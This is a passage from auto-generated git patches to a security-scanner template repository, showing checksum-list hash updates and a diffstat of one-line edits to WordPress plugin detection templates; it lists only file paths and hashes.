+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6807,7 +6809,7 @@ http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml:6fd8e08ca4b3af4 http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml:160c8e016dfa7a4351957053c48c49164fd086a6 http/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml:7abfe49b07546c0b23c0076826ec6e16928af900 http/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml:e947f04741086e7de80038709ae5f043a8440ecb -http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml:8da516b1230809622723cfcf26506c1be3a8adf4 +http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml:6e450e819459207d6bde7d23a14f331380e0882b http/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml:eab30e14ab1e1f73cb16a5a87fa3faa8eb686d48 http/vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml:76df72e230808ceda3fd00315c12df12ffe1b6f4 http/vulnerabilities/wordpress/wordpress-updraftplus-pem-key.yaml:b1572bedd080878a2f919d31b489e19bf8806c04 @@ -7037,7 +7039,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:388a1a7d6051b2bf2d283447dbc02ed6493d12ec +templates-checksum.txt:ab1228b24cb1a41c08aca33d762c54d6a172ff79 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 466bdbdf411808ad1c17f132c5e994b74f11f8f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 05:03:58 +0000 Subject: [PATCH 0129/1090] TemplateMan Update [Tue Sep 5 05:03:58 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + 